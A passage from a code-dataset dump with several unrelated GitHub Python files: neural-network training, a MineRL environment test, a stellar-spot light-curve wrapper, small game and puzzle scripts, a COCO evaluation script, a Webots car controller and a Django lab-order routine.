param_man.updates['hiddenLayerRBM{:02d}'.format(l) + '_vbias']\n \n end_time = timeit.default_timer()\n logger.info('The pretraining code for file '\n + os.path.split(__file__)[1]\n + ' ran for {:.2f}m'.format((end_time - start_time) / 60.))\n \n logger.info('Training (fine-tuning) the model ...')\n \n # visualise cost during runtime\n visualise_cost = { # visualising the cost\n 'cost':{'freq':finetrain_vis_freq} # frequency of sampling\n }\n \n new_params = {\n 'logitLayer' + '_weights': {\n 'x': dbn.logitLayer.w,\n 'freq':finetrain_vis_freq,\n },\n 'logitLayer' + '_bias': {\n 'x':dbn.logitLayer.b,\n 'freq':finetrain_vis_freq,\n }\n }\n visualise_updates = {\n 'logitLayer' + '_weights': {\n 'update_position':dbn.n_layers-2,\n 'freq':finetrain_vis_freq\n },\n 'logitLayer' + '_bias': {\n 'update_position':dbn.n_layers-1,\n 'freq':finetrain_vis_freq\n }\n }\n \n for l in range(dbn.n_layers):\n new_params['hiddenLayer{:02d}'.format(l) + '_weights'] = {\n 'x': dbn.sigmoid_layers[l].w,\n 'freq':finetrain_vis_freq,\n }\n new_params['hiddenLayer{:02d}'.format(l) + '_bias'] = {\n 'x': dbn.sigmoid_layers[l].b,\n 'freq':finetrain_vis_freq,\n }\n visualise_updates['hiddenLayer{:02d}'.format(l) + '_weights'] = {\n 'update_position':l*2,\n 'freq':finetrain_vis_freq\n }\n visualise_updates['hiddenLayer{:02d}'.format(l) + '_bias'] = {\n 'update_position':l*2+1,\n 'freq':finetrain_vis_freq\n }\n \n # Visualise these items during training\n visualise_weights = { # dict of images to create\n 'inputLayer' + '_weights': { # input - hiddenlayer image\n 'x':dbn.sigmoid_layers[0].w,# the parameter\n 'img_shape':(29*2, 29*2*3), # prod. of tuple == # input nodes\n 'tile_shape':(25, 40), # Max number is # nodes in next layer\n 'tile_spacing':(1, 1), # separate imgs x,y\n 'freq':finetrain_vis_freq,\n 'runtime_plots':True\n },\n 'logitLayer' + '_weights': { # hidden - logistic layer\n 'x':dbn.logitLayer.w,\n 'img_shape':(40, 25), # prod. of tuple == # hidden nodes\n 'tile_shape':(1, 2),\n 'freq':finetrain_vis_freq\n }\n }\n # add the weights for each hidden layer\n # This can only be done as hidden_layer_sizes are all the same\n for i in range(1, dbn.n_layers):\n visualise_weights['hiddenLayer{:02d}'.format(i) + '_weights'] = {\n 'x':dbn.sigmoid_layers[i].w,\n 'img_shape':(40, 25),\n 'tile_shape':(25, 25),\n 'freq':finetrain_vis_freq\n }\n \n param_man.initalise(\n run_id = MODEL_ID,\n default_freq = n_train_batches//2,\n params = new_params,\n imgs = visualise_weights,\n cost = visualise_cost,\n updates = visualise_updates\n )\n \n # get the training, validation and testing function for the model\n logger.debug('building fine-tuning functions')\n train_model, validate_model, test_model = dbn.buildFinetuneFunctions(\n datasets=datasets,\n batch_size=batch_size,\n learning_rate=finetune_lr\n )\n \n logger.debug('training')\n \n utils.training.train(dbn, train_model, validate_model, test_model,\n n_train_batches, n_valid_batches, n_test_batches,\n training_epochs, finetune_lr,\n patience, patience_increase, improvement_threshold,\n MODEL, MODEL_ID, logger,\n visualise=param_man\n )\n pass","repo_name":"flipdazed/weather-modelling","sub_path":"train_dbn.py","file_name":"train_dbn.py","file_ext":"py","file_size_in_byte":12587,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"8084277123","text":"# Simple env test.\nimport json\nimport select\nimport time\nimport logging\nimport threading\n\nimport gym\nimport matplotlib.pyplot as plt\nimport minerl\nimport numpy as np\nfrom minerl.env.core import MineRLEnv\n\nimport coloredlogs\n\ncoloredlogs.install(logging.DEBUG)\n\n# import minerl.env.bootstrap\n# minerl.env.bootstrap._check_port_avail = lambda _,__: True\n\nNUM_EPISODES = 1\nNUM_ENVS = 2\n\n\nclass MineRLRunner(threading.Thread):\n def __init__(self, env_name, create_synchronously=True, **kwargs):\n self.env_name = env_name\n if create_synchronously:\n self.env = gym.make(env_name)\n else:\n self.env = None\n super().__init__(**kwargs)\n\n def run(self):\n env = self.env\n if env is None:\n env = gym.make(self.env_name)\n for _ in range(NUM_EPISODES):\n obs = env.reset()\n done = False\n netr = 0\n while not done:\n random_act = env.action_space.noop()\n\n random_act['camera'] = [0, 0.1 * obs[\"compassAngle\"]]\n random_act['back'] = 0\n random_act['forward'] = 1\n random_act['jump'] = 1\n random_act['attack'] = 1\n obs, reward, done, info = env.step(\n random_act)\n netr += reward\n env.close()\n print(f'{self.getName()} finished!')\n\n\ndef test(create_synchronously=True):\n threads = [MineRLRunner('MineRLNavigateDense-v0', create_synchronously) for _ in range(NUM_ENVS)]\n for t in threads:\n t.start()\n while any([t.is_alive() for t in threads]):\n time.sleep(1)\n\n\nif __name__ == \"__main__\":\n test()\n","repo_name":"minerllabs/minerl","sub_path":"tests/excluded/multiple_env_test.py","file_name":"multiple_env_test.py","file_ext":"py","file_size_in_byte":1686,"program_lang":"python","lang":"en","doc_type":"code","stars":587,"dataset":"github-code","pt":"52"} +{"seq_id":"19343169989","text":"# Licensed under the MIT License - see LICENSE.rst\nfrom __future__ import (absolute_import, division, print_function,\n unicode_literals)\nfrom glob import glob\nimport datetime\nfrom threading import Lock\nfrom warnings import warn\nimport os, subprocess, shutil\n\nimport numpy as np\nfrom astropy.io import ascii\nfrom astropy.io.ascii import InconsistentTableError\n\nfrom .lightcurve import LightCurve\nfrom .exceptions import (OverlappingSpotsWarning, STSPMemoryWarning,\n STSPFailureWarning)\n\n\n__all__ = ['STSP', 'clean_up_rms_stsp_dirs']\n\nlock = Lock()\n\nstsp_executable = os.getenv('STSP_EXECUTABLE')\n\ninfile_template_l = \"\"\"#PLANET PROPERTIES\n1\t\t\t\t\t\t\t; Number of planets -- (if there are more than 1 planet, then the set of 8 planet properties are repeated)\n{t0:2.10f}\t\t\t\t\t; T0, epoch (middle of first transit) in days.\n{period:2.10f}\t\t\t\t; Planet Period (days)\n{depth:2.10f}\t\t\t\t; (Rp/Rs)^2 (Rplanet / Rstar )^ 2\n{duration:2.10f}\t\t\t; Duration (days) (physical duration of transit, not used)\n{b:2.10f}\t\t\t\t\t; Impact parameter (0= planet cross over equator)\n{inclination:2.10f}\t\t\t; Inclination angle of orbit (90 deg = planet crosses over equator)\n{lam:2.10f}\t\t\t\t\t; Lambda of orbit (0 deg = orbital axis along z-axis)\n{ecosw:2.10f}\t\t\t; ecosw\n{esinw:2.10f}\t\t\t; esinw\n#STAR PROPERTIES\n{rho_s:2.10f} \t\t\t; Mean Stellar density (Msun/Rsun^3)\n{per_rot:2.10f}\t\t\t; Stellar Rotation period (days)\n4780\t\t\t\t\t; Stellar Temperature\n0.31\t\t\t\t\t; Stellar metallicity\n{tilt_from_z:2.10f}\t\t\t\t\t\t; Tilt of the rotation axis of the star down from z-axis (degrees)\n{nonlinear_ld}\t\t\t; Limb darkening (4 coefficients)\n{n_ld_rings:d}\t\t\t; number of rings for limb darkening appoximation\n#SPOT PROPERTIES\n{n_spots}\t\t\t\t\t\t; number of spots\n{spot_contrast}\t\t\t\t\t; fractional lightness of spots (0.0=total dark, 1.0=same as star)\n#LIGHT CURVE\n{model_path}\t\t\t; lightcurve input data file\n{start_time:2.10f}\t\t; start time to start fitting the light curve\n{lc_duration:2.10f}\t\t; duration of light curve to fit (days)\n{real_max:2.10f}\t\t; real maximum of light curve data (corrected for noise), 0 -> use downfrommax\n{normalize_oot:d} \t; is light curve flattened (to zero) outside of transits?\n#ACTION\nl\t\t\t\t\t\t; l= generate light curve from parameters\n{spot_params}\n1.00\n\"\"\"\n\nspot_params_template = \"\"\"{spot_radius:2.10f}\t\t; spot radius\n{spot_theta:2.10f}\t\t; theta\n{spot_phi:2.10f}\t\t; phi\n\"\"\"\n\n\ndef quadratic_to_nonlinear(u1, u2):\n a1 = a3 = 0\n a2 = u1 + 2*u2\n a4 = -u2\n return a1, a2, a3, a4\n\n\ndef _spot_obj_to_params(spot, quiet=False):\n\n if hasattr(spot, '__len__'):\n non_overlapping_spot_inds = find_overlapping_spots(spot)\n return np.concatenate([[s.r, s.theta, s.phi]\n for i, s in enumerate(spot)\n if i in non_overlapping_spot_inds])\n else:\n return np.array([spot.r, spot.theta, spot.phi])\n\n\ndef find_overlapping_spots(spot_list):\n from overlap import find_overlapping_spots as find\n return find(np.array([spot.theta for spot in spot_list]),\n np.array([spot.phi for spot in spot_list]),\n np.array([spot.r for spot in spot_list]))\n\n# def find_overlapping_spots(spot_list, tolerance=1.01, quiet=False):\n# \"\"\"\n# Find overlapping spots in a list of spot objects.\n#\n# Parameters\n# ----------\n# spot_list : list\n# tolerance : float\n# \"\"\"\n# overlapping_pairs = []\n# spots_with_overlap = []\n# for i in range(len(spot_list)):\n# for j in range(len(spot_list)):\n# if i < j:\n# sep = np.arccos(np.cos(spot_list[i].theta) *\n# np.cos(spot_list[j].theta) +\n# np.sin(spot_list[i].theta) *\n# np.sin(spot_list[j].theta) *\n# np.cos(spot_list[i].phi - spot_list[j].phi))\n# if sep < tolerance * (spot_list[i].r + spot_list[j].r):\n# overlapping_pairs.append((i, j))\n#\n# if i not in spots_with_overlap:\n# spots_with_overlap.append(i)\n# if j not in spots_with_overlap:\n# spots_with_overlap.append(j)\n#\n# spots_without_overlap = [spot for i, spot in enumerate(spot_list)\n# if i not in spots_with_overlap]\n# save_these_spot_indices = [i[0] for i in overlapping_pairs]\n# save_these_spots = [spot for i, spot in enumerate(spot_list)\n# if i in save_these_spot_indices]\n#\n# if len(spots_with_overlap) > 0 and not quiet:\n# toss_these_spot_indices = [i[1] for i in overlapping_pairs]\n# toss_these_spots = [spot for i, spot in enumerate(spot_list)\n# if i in toss_these_spot_indices]\n# warning_message = ('Some spots were overlapping. Tossing one of the two'\n# ' overlapping spots. \\n\\nSpots tossed:\\n\\n' +\n# '\\n'.join(map(str, toss_these_spots)))\n# warn(warning_message, OverlappingSpotsWarning)\n#\n# return spots_without_overlap #+ save_these_spots\n\n\ndef get_rms_dirs():\n \"\"\"\n Get a list of the STSP directories generated by the rms package.\n \"\"\"\n pkg_dir = os.path.dirname(os.path.abspath(__file__))\n rms_stsp_dirs = glob(os.path.join(pkg_dir, '.rms*'))\n return rms_stsp_dirs\n\n\ndef check_for_undeleted_stsp_dirs(n_dirs_threshold=5):\n \"\"\"\n Check for necessary cleanup warnings.\n\n The current API writes STSP input files and output files within the rms\n package directory. This function will raise a warning if the number of\n STSP run directories is piling up, so you don't accidentally store lots of\n hidden directories within the rms package directory.\n \"\"\"\n rms_stsp_dirs = get_rms_dirs()\n\n if len(rms_stsp_dirs) > n_dirs_threshold:\n warn_message = (\"You currently have more than {0} STSP input/output \"\n \"directories stored by rms. Consider turning off \"\n \"the `keep_dirs` option, and using the \"\n \"`rms.clean_up_rms_stsp_dirs` command to delete them \"\n \"(and to prevent saving tons of hidden folders within \"\n \"the rms package). \"\n \"\\n\\nDirectories to delete:\\n\\n{1}\"\n .format(n_dirs_threshold, '\\n'.join(rms_stsp_dirs)))\n warn(warn_message, STSPMemoryWarning)\n\n\ndef clean_up_rms_stsp_dirs():\n \"\"\"\n Delete lingering STSP input/output directories created by rms.\n\n Whenever the STSP object is constructed and `outdir` is not specified, a\n new directory is created within the rms package directory. If you use the\n `keep_dirs` option or an unexpected error occurs while running STSP, those\n hidden directories created by rms can accrue. And nobody wants that. So you\n can use this command to make them go away.\n \"\"\"\n rms_stsp_dirs = get_rms_dirs()\n for directory in rms_stsp_dirs:\n shutil.rmtree(directory)\n\n\nclass STSP(object):\n \"\"\"\n Context manager for working with STSP\n \"\"\"\n def __init__(self, times, star, spot, outdir=None, keep_dir=False,\n quiet=False):\n \"\"\"\n Parameters\n ----------\n times : `~astropy.time.Time`\n Time array object\n star : `~rms.Star`\n Parameters for star\n spot : `~rms.Spot` or list of `~rms.Spot` objects\n Spot parameter object(s)\n outdir : str\n Directory to write temporary outputs into\n skip_overlap_check : bool\n If True, skip check that no spots are overlapping.\n \"\"\"\n self.times = times\n self.star = star\n self.quiet = quiet\n self.spot_params = _spot_obj_to_params(spot, quiet=quiet)\n self.spot_contrast = self.star.spot_contrast\n\n current_time = datetime.datetime.now().strftime(\"%Y%m%d_%H%M%S_%f\")\n random_integer = np.random.randint(0, 1e6)\n\n if outdir is None:\n self.outdir = os.path.abspath(os.path.join(os.path.dirname(__file__),\n '.rms_tmp_{0}_{1}'\n .format(current_time, random_integer)))\n else:\n self.outdir = outdir\n\n os.makedirs(self.outdir)\n\n self.model_path = os.path.join(self.outdir, 'model_lc.dat')\n self.keep_dir = keep_dir\n\n def __enter__(self):\n check_for_undeleted_stsp_dirs()\n return self\n\n def __exit__(self, *args):\n if not self.keep_dir:\n shutil.rmtree(self.outdir)\n\n def generate_lightcurve(self, n_ld_rings=40, stsp_exec=None,\n normalize_oot=False):\n \"\"\"\n Generate a light curve with STSP.\n\n Parameters\n ----------\n n_ld_rings : int\n Number of concentric rings to use in the limb-darkening\n approximation\n stsp_exec : str (optional)\n Optionally pass in a path to a different STSP executable with this\n argument.\n normalize_oot : bool\n Normalize the out-of-transit portions of the light curve? Default\n is `False`. Set to `True` when studying spot occultations during\n transits.\n\n Return\n ------\n lc : `~rms.LightCurve`\n Light curve object with the model from STSP.\n \"\"\"\n\n if stsp_exec is None:\n stsp_exec = stsp_executable\n\n # Normalize light curve to unity\n real_max = 1\n\n times = self.times.jd\n fluxes = np.ones_like(times)\n\n np.savetxt(self.model_path, np.vstack([times, fluxes, fluxes]).T,\n fmt=str('%1.10f'), delimiter='\\t', header='stspinputs')\n\n # Calculate parameters for STSP:\n eccentricity, omega = self.star.planet.ecc, self.star.planet.w\n ecosw = eccentricity*np.cos(np.radians(omega))\n esinw = eccentricity*np.sin(np.radians(omega))\n start_time = times[0]\n lc_duration = times[-1] - times[0] + 1e-6\n nonlinear_ld = quadratic_to_nonlinear(*self.star.u)\n nonlinear_ld_string = ' '.join(map(\"{0:.5f}\".format, nonlinear_ld))\n\n # get spot parameters sorted out\n spot_params_str = _spot_params_to_string(self.spot_params)\n\n # Stick those values into the template file\n\n params_dict = dict(period=self.star.planet.per, ecosw=ecosw,\n esinw=esinw, lam=self.star.planet.lam,\n tilt_from_z=90-self.star.inc_stellar,\n start_time=start_time, lc_duration=lc_duration,\n real_max=real_max, per_rot=self.star.per_rot,\n rho_s=self.star.rho_s, depth=self.star.planet.rp ** 2,\n duration=self.star.planet.duration,\n t0=self.star.planet.t0, b=self.star.planet.b,\n inclination=self.star.planet.inc,\n nonlinear_ld=nonlinear_ld_string,\n n_ld_rings=n_ld_rings,\n spot_params=spot_params_str[:-1],\n n_spots=int(len(self.spot_params)/3),\n model_path=os.path.basename(self.model_path),\n spot_contrast=self.spot_contrast,\n normalize_oot=int(normalize_oot))\n\n in_file_text = infile_template_l.format(**params_dict)\n\n # Write out the `.in` file\n with open(os.path.join(self.outdir, 'test.in'), 'w') as in_file:\n in_file.write(in_file_text)\n\n try:\n stdout = subprocess.check_call([stsp_exec, 'test.in'],\n cwd=self.outdir)\n except subprocess.CalledProcessError as err:\n if not self.quiet:\n warning_message = (\"STSP failed - this could be a result of \"\n \"bad inputs.\")\n warn(warning_message, STSPFailureWarning)\n\n # Read the outputs\n lcout_path = os.path.join(self.outdir, 'test_lcout.txt')\n if not os.path.exists(lcout_path) or os.stat(lcout_path).st_size == 0:\n stsp_times = self.times.jd\n stsp_fluxes = np.ones(len(self.times))\n stsp_flag = 0 * np.ones(len(self.times))\n\n else:\n try:\n tbl = ascii.read(lcout_path,\n format='fast_no_header')\n stsp_times, stsp_fluxes, stsp_flag = tbl['col1'], tbl['col4'].data, tbl['col5']\n except InconsistentTableError:\n stsp_times = self.times.jd\n stsp_fluxes = np.ones(len(self.times)) * np.nan\n stsp_flag = 0 * np.ones(len(self.times))\n return LightCurve(times=stsp_times, fluxes=stsp_fluxes, quarters=stsp_flag)\n\n\ndef _spot_params_to_string(spot_params):\n spot_params_str = \"\"\n for param_set in np.split(spot_params, len(spot_params)/3):\n spot_params_str += spot_params_template.format(spot_radius=param_set[0],\n spot_theta=param_set[1],\n spot_phi=param_set[2])\n return spot_params_str\n\n\n","repo_name":"bmorris3/rms","sub_path":"rms/stsp.py","file_name":"stsp.py","file_ext":"py","file_size_in_byte":13363,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"9171010222","text":"from gameComponents import gameVars, winOrLose\n\n\n\n\ndef winorlose(status):\n\n\tprint(\"You\", status, \"! Whould you like to play again?\")\n\tchoice = input(\"Yes / No\")\n\n\tif choice == \"Yes\" or choice == \"No\":\n\t\tprint(\"You chose to leave! Next time you get better luck :)\")\n\t\texit()\n\n\telif choice == \"Yes\" or choice == \"yes\":\n\t\t# reset the player lives and the AI lives\n\t\t# and set player to False so that our loop will restart\n\n\t\tgameVars.player_lives = 5\n\t\tgameVars.ai_lives = 5\n\t\tgameVars.player = False\n\n\n\telse:\n\t\tprint(\"Make a valid choice - Yes or No\")\n\t\tchoice = input(\"Yes / No: \")\n","repo_name":"YeonjuKim05/Kim_Y_RPS_Fall2020","sub_path":"gameComponents/chooseWinner.py","file_name":"chooseWinner.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12817375247","text":"import sys\n\n\ndef solve(cur_day, cur_muscle):\n global n, k, kits, visited, ans\n\n if cur_day == n:\n ans += 1\n return\n\n for i in range(n):\n if visited[i]:\n continue\n\n if cur_muscle + kits[i] - k < 500:\n continue\n\n visited[i] = True\n solve(cur_day + 1, cur_muscle + kits[i] - k)\n visited[i] = False\n\n\nn, k = map(int, sys.stdin.readline().strip().split(\" \"))\nkits = list(map(int, sys.stdin.readline().strip().split(\" \")))\nvisited = [False for _ in range(n)]\nans = 0\nsolve(0, 500)\nprint(ans)","repo_name":"galid1/Algorithm","sub_path":"python/baekjoon/2.algorithm/brute_force/18429.근손실.py","file_name":"18429.근손실.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"74498296483","text":"from coco import coco\nfrom coco import cocoeval\nimport json\n\nimport argparse\nparser = argparse.ArgumentParser(description='Evaluation Arguments')\nparser.add_argument('--result', required=True, type=str, help='coco results json')\nargs = parser.parse_args()\n\n\nresult_file = args.result\nann_file = 'path/to/instances_val2017.json'\n\ndef main():\n coco_gt = coco.COCO(ann_file)\n coco_dt = coco_gt.loadRes(result_file)\n\n coco_eval = cocoeval.COCOeval(coco_gt, coco_dt, 'bbox', eval_pkl=None, vis_path=None)\n\n coco_eval.evaluate()\n coco_eval.accumulate()\n coco_eval.summarize()\n\n\nif __name__ == '__main__':\n main()","repo_name":"Artherbull/test1","sub_path":"eval_coco.py","file_name":"eval_coco.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"6595795120","text":"# coded by lagcleaner\n# email: lagcleaner@gmail.com\n\nfrom io import BytesIO\nfrom typing import Union\nfrom multipledispatch import dispatch\nfrom tfprotocol_client.misc.build_utils import MessageUtils\nfrom tfprotocol_client.misc.constants import (\n DFLT_HEADER_SIZE,\n INT_SIZE,\n)\n\n\nclass TfProtocolMessage:\n \"\"\"Transfer Protocol Message object builder.\"\"\"\n\n def __init__(\n self,\n *payloads,\n custom_header: Union[int, bytes, None] = None,\n header_signed: bool = True,\n trim_body: bool = False,\n separate_by_spaces: bool = True,\n header_size: int = DFLT_HEADER_SIZE,\n ) -> None:\n self.custom_header = MessageUtils.encode_value(\n custom_header, size=header_size, signed=header_signed\n )\n self.body_buffer = BytesIO()\n self.header_size = header_size if header_size else DFLT_HEADER_SIZE\n self.header_signed = header_signed\n for i, e in enumerate(payloads):\n if separate_by_spaces and i != 0:\n self.add(b' ')\n self.add(e)\n self.trim_body = trim_body\n\n @dispatch((str, bytes, bool))\n def add(self, payload: Union[str, bytes, bool], **_):\n self.body_buffer.write(MessageUtils.encode_value(payload))\n return self\n\n # pylint: disable=function-redefined\n @dispatch(int)\n def add(self, payload: int, size: int = INT_SIZE, signed=False, **_):\n self.body_buffer.write(\n MessageUtils.encode_value(payload, size=size, signed=signed)\n )\n return self\n\n @property\n def header(self) -> bytes:\n if self.custom_header is not None:\n header = MessageUtils.encode_value(self.custom_header)\n else:\n header = MessageUtils.encode_value(\n len(self.payload), size=self.header_size, signed=self.header_signed\n )\n return header\n\n @property\n def payload(self) -> bytes:\n if self.trim_body:\n return self.body_buffer.getvalue().strip(b' ')\n return self.body_buffer.getvalue()\n\n def __iter__(self):\n yield self.header\n yield self.payload\n","repo_name":"GoDjango-Development/tfprotocol_client_py","sub_path":"tfprotocol_client/models/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":2147,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"73521715044","text":"#Piotr Socała\n# (stworzenie f-cji pomocniczej sprawdzającej NWD)\n# przeiteruję po kolejnych elementach tablicy\n# i będę rozpatrywał wszystkie możliwe możliwości\n# w 3 pętlach for\n#\n\n\ndef check_NWD(a, b, c):\n if a == 1 or b == 1 or c == 1:\n return 1\n first = 0\n second = 0\n third = 0\n i = 2\n while i <= a and i <= b:\n if a % i == 0 and b % i == 0:\n first = i\n break\n i += 1\n if first == 0:\n first = 1\n i = 2\n while i <= a and i <= c:\n if a % i == 0 and c % i == 0:\n second = i\n break\n i += 1\n if second == 0:\n second = 1\n\n i = 2\n while i <= b and i <= c:\n if b % i == 0 and c % i == 0:\n second = i\n break\n i += 1\n if third == 0:\n third = 1\n\n if first == second == third == 1:\n return True\n\n return False\n\n#end def\n\n\ndef trojki(T):\n k = len(T)\n counter = 0\n for x in range(k-2):\n for y in range(x+1, x+3):\n if y <= k-2:\n for z in range(y+1, y+3):\n if z > k-1:\n break\n if check_NWD(T[x], T[y], T[z]):\n counter += 1\n\n return counter\n#end def\n\n\n","repo_name":"Gygrus/WDI-ASD-course-Python","sub_path":"Semestr I/Kolosy nie dla wrpawy/kolos 22.01.2021 zdany już jupi/zad5.py","file_name":"zad5.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41809657249","text":"\"\"\"Voiture autonome avec utilisation d'un\nLIDAR sur WEBOTS\nAuteur : Chrysanthe et Jessica\n\"\"\"\n\nimport numpy as np\nimport random\nimport time\nimport matplotlib.pyplot as plt\nimport json\nimport datetime\nimport os.path as osp\nimport sys\nsys.path.append(\"../\")\nfrom car_logic import CarLogic\n\n\n# --------------GYM----------------------------\n\nclass CarController(CarLogic):\n def __init__(self):\n print(\"Initialisating the Webots/Gym environnement...\")\n super().__init__() # Objet héritant la classe Driver\n\n self.trajectories = {'rotations':[],'positions':[]}\n self.num_laps = 0\n self.goal_num_laps = 2\n\n self.INITIAL_trans = self.car.getPosition()\n self.INITIAL_rot = self.car.getField(\"rotation\").getSFRotation()\n\n def respawn(self,speedCommand=0,steeringCommand=0):\n\n x,y,z = self.INITIAL_trans\n INITIAL_trans = [x + random.uniform(-0.05,0.05), y+ random.uniform(-0.05,0.05), z]\n INITIAL_rot = self.INITIAL_rot\n self.trans_champs.setSFVec3f(INITIAL_trans)\n self.rot_champs.setSFRotation(INITIAL_rot)\n\n time.sleep(0.3)\n self.current_advancement = set()\n self.current_positions = []\n self.current_rotations = []\n\n # Remise à 0 pour l'environnement GYM\n def reset(self):\n super().reset()\n self.trajectories['positions'].append(self.current_positions)\n self.trajectories['rotations'].append(self.current_rotations)\n\n\n\n def step(self):\n\n self.current_positions.append(self.car.getPosition())\n self.current_rotations.append(self.car.getField(\"rotation\").getSFRotation())\n\n ##check tour\n balise = self.capteur_balise.getValue()\n\n if balise > 700:\n id = self.get_balise_id()\n if id not in self.current_advancement:\n self.current_advancement.add(id)\n if len(self.current_advancement) >= len(self.balises):\n self.num_laps +=1\n if self.num_laps + 1 > self.goal_num_laps:\n self.reset()\n return False\n self.reset()\n else:\n print(f\"Balise {id} passée\")\n\n\n ## Conduite\n\n xy_lidar = list(map(lambda x: (x.x, x.y), self.lidar.getPointCloud()))\n y_lidar = list(map(lambda x: x.y, self.lidar.getPointCloud()))\n\n dist = list(map(lambda p: p[0] ** 2 + p[1] ** 2, xy_lidar))\n # front_dist = np.array(dist[-8:] + dist[:8])\n front_dist = np.array(dist[-8:] + dist[:8])\n\n max_front_dist = front_dist[np.isfinite(front_dist)].min()\n id = dist.index(max_front_dist)\n\n if id in [0, 1, len(dist), len(dist) - 1]:\n super().setCruisingSpeed(-0.5)\n super().setSteeringAngle(-0.1)\n\n elif y_lidar[id] < 0:\n super().setCruisingSpeed(0.5)\n super().setSteeringAngle(-0.4)\n else:\n super().setCruisingSpeed(0.5)\n super().setSteeringAngle(0.4)\n\n\n\n super().step()\n\n return True\n\n\n# ----------------Programme principal--------------------\ndef main():\n t = datetime.datetime.now()\n t = t.strftime('-%H%M-%d%m')\n map_name = \"MultiTrackEasy_1\"\n path_to_traj = osp.join(\"../../worlds/trajectories\",f\"{map_name}-{t}.json\")\n\n\n carController = CarController()\n carController.respawn()\n\n\n for _ in range(10000):\n running = carController.step()\n\n if not running:\n break\n print(\"Fin du roulage :)\")\n\n\n traj_1_position = carController.trajectories['positions'][0]\n traj_1_rotation = carController.trajectories[\"rotations\"][0]\n\n\n rotations = []\n positions = []\n for i in range(10,len(traj_1_position),20):\n rotations.append(traj_1_rotation[i])\n positions.append(traj_1_position[i])\n\n x_traj = list(map(lambda x: x[0], positions))\n y_traj = list(map(lambda x: x[1], positions))\n plt.scatter(x_traj, y_traj)\n plt.show()\n\n print(len(rotations))\n with open(path_to_traj, 'w') as f:\n f.write(json.dumps({'positions':positions,'rotations':rotations}))\n\n # a = json.loads(f.read())\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"Maxew42/dockerfile-ros2-webots","sub_path":"scripts/controllers/trajectory_estimator/trajectory_estimator.py","file_name":"trajectory_estimator.py","file_ext":"py","file_size_in_byte":4202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31949357340","text":"# -*- coding: utf-8 -*-\n\nimport logging\nimport requests\nimport datetime\n\nfrom util.db_helper import *\nfrom util.response import *\nfrom util.dict_helper import *\nfrom util.format_helper import *\nfrom oms.models.order_models import LabOrder,LabProduct\nfrom oms.models.utilities_models import *\nfrom wms.models import inventory_struct_lens, product_frame\nfrom vendor.models import lens\nfrom pg_oms import settings\n\n\nclass stockorder_to_laborder_controller:\n\n def create_laborder(self, data_dict, flag):\n data = {}\n try:\n order_number = data_dict['stock_order_number']\n order_number_part = order_number[9:]\n order_date = datetime.datetime.now()\n year = order_date.year\n str_year = str(year)\n year_part = str_year[len(str_year) - 1:len(str_year)]\n month = order_date.month\n str_month = str(month)\n if len(str_month) == 1:\n str_month = '0' + str_month\n day = order_date.day\n str_day = str(day)\n if len(str_day) == 1:\n str_day = '0' + str_day\n if flag == 'list':\n qty = data_dict['remaining_qty']\n else:\n qty = data_dict['lab_qty']\n\n last_laborders = LabOrder.objects.filter(lab_number__contains=order_number_part).order_by(\"-id\")\n if len(last_laborders) > 0:\n str_count = last_laborders[0].lab_number.split(\"-\")[-1]\n if \"T\" in str_count:\n count = 1\n else:\n count = int(str_count) + 1\n else:\n count = 0\n\n inv_struct_lens = inventory_struct_lens.objects.filter(sku=data_dict['od_lens_sku'])\n sku = inv_struct_lens[0].base_sku\n if '-' in sku[0:2]:\n vendor =sku[:1]\n else:\n vendor =sku[:2]\n\n lens_list = lens.objects.filter(sku=sku)\n if len(lens_list) > 0:\n lens_name = lens_list[0].name\n else:\n lens_name = inv_struct_lens[0].name.replace(\"-近视\", \"\").replace(\"-老花\", \"\")\n\n pf_lists = product_frame.objects.filter(sku=data_dict['frame'])\n if len(pf_lists) == 0:\n image = ''\n thumbnail = ''\n else:\n pf = pf_lists[0]\n image = pf.image\n thumbnail = pf.thumbnail\n\n for i in range(1, int(qty)+1):\n lab_order_number = year_part + str_month + str_day + '-' + order_number_part + '-' + str(i) + \"T\" + str(\n qty)\n if count > 0:\n lab_order_number = lab_order_number + \"-\" + str(count)\n lbo = LabOrder()\n # General\n lbo.lab_number = lab_order_number\n lbo.order_number = order_number\n lbo.base_entity = data_dict['id']\n lbo.type = 'STKO'\n lbo.chanel = ''\n lbo.is_vip = False\n lbo.tag = 'WEBSITE'\n lbo.ship_direction = 'EMPLOYEE'\n lbo.act_ship_direction = 'EMPLOYEE'\n\n lbo.order_date = order_date\n lbo.order_datetime = datetime.datetime.strptime(data_dict['start_date'], '%Y-%m-%d %H:%M:%S')\n lbo.frame = data_dict['frame']\n lbo.lens_sku = ''\n lbo.quantity = 1\n lbo.vendor = vendor\n\n if int(vendor)<10:\n lbo.lens_sku = inv_struct_lens[0].base_sku[2:]\n else:\n lbo.lens_sku = inv_struct_lens[0].base_sku[3:]\n\n lbo.lens_name = lens_name\n lbo.act_lens_name = lens_name\n lbo.act_lens_sku = inv_struct_lens[0].base_sku\n lbo.od_sph = data_dict['od_lens_sph']\n lbo.od_cyl = data_dict['od_lens_cyl']\n lbo.os_sph = data_dict['os_lens_sph']\n lbo.os_cyl = data_dict['os_lens_cyl']\n lbo.comments = data_dict['comments']\n lbo.comments_inner = ''\n\n lbo.estimated_ship_date = order_date+ datetime.timedelta(days=7)\n lbo.estimated_time = order_date+ datetime.timedelta(days=7)\n lbo.estimated_date = order_date+ datetime.timedelta(days=7)\n lbo.targeted_date = order_date+ datetime.timedelta(days=7)\n lbo.image = image\n lbo.thumbnail = thumbnail\n lbo.save()\n 